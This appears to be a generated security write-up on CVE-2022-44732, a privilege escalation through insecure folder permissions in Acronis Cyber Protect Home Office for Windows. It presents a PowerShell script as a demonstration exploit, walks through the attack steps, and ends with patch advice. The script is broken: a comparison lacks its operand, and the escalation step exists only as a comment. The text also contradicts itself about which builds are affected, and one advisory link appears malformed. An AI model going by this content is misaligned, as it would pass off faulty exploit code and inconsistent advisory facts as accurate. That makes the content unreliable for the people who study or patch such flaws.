CVE-2022-44732 - Local Privilege Escalation Vulnerability in Acronis Cyber Protect Home Office (Windows) before Build 39900

A critical vulnerability has been discovered in Acronis Cyber Protect Home Office (Windows), allowing attackers to exploit insecure folder permissions and escalate their system privileges. This vulnerability has been identified as CVE-2022-44732 and impacts all versions of the software up to build 39900.

Vulnerability Details

The vulnerability is due to improper folder permissions configured on sensitive folders within the software's installation, allowing any local user to create, modify, or delete files and folders in these locations. As a result, an attacker with local access to the system can potentially run arbitrary or malicious code, escalate their privileges to that of an administrative user, and ultimately compromise the entire system.

The following PowerShell script demonstrates the exploit

# Discover the vulnerable folder
$acronisFolder = "C:\Program Files (x86)\Acronis\"
$writeableFolder = Get-ChildItem -Path $acronisFolder -Directory -Recurse | Where-Object {($_.PSIsContainer -eq $true) -and ((Get-Acl $_.FullName).Access | Where-Object {($_.IdentityReference -match 'Everyone') -and ($_.FileSystemRights -match 'Write')}).Count -gt )}

# Exploit the vulnerable folder
if($writeableFolder){
  New-Item -ItemType file -Path $writeableFolder -Name "exploit.exe"
  # Execute exploit.exe with SYSTEM privileges
}

Original References

- CVE entry: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44732
- Acronis Security Advisory: https://www.acronis.com/en-us/support/security-advisories/asa-20222-1/

Exploit Details

To exploit this vulnerability, an attacker would first need local access to the affected system. Once access is obtained, the attacker can run the provided PowerShell script to identify any writable folders within the Acronis installation directory. The attacker can then create a malicious executable file within the writable folder and execute it to escalate their privileges, achieving full control over the system.

Recommendation

The Acronis team has released a patch to address this vulnerability, and it is strongly recommended that users immediately update their software to Acronis Cyber Protect Home Office build 39900 or higher. Users can download the latest version of the software from the following link: https://www.acronis.com/en-us/lp/personal/computer-backup/

Additionally, users should periodically review the security settings of folder permissions to identify any potential configurational weaknesses in the system.

Conclusion

The CVE-2022-44732 vulnerability in Acronis Cyber Protect Home Office is a significant security issue that can lead to a full system compromise if exploited. It is crucial to maintain updated software and periodically inspect configuration settings in order to minimize the risk posed by this and other vulnerabilities.

Timeline

Published on: 11/07/2022 19:15:00 UTC
Last modified on: 07/06/2023 14:47:00 UTC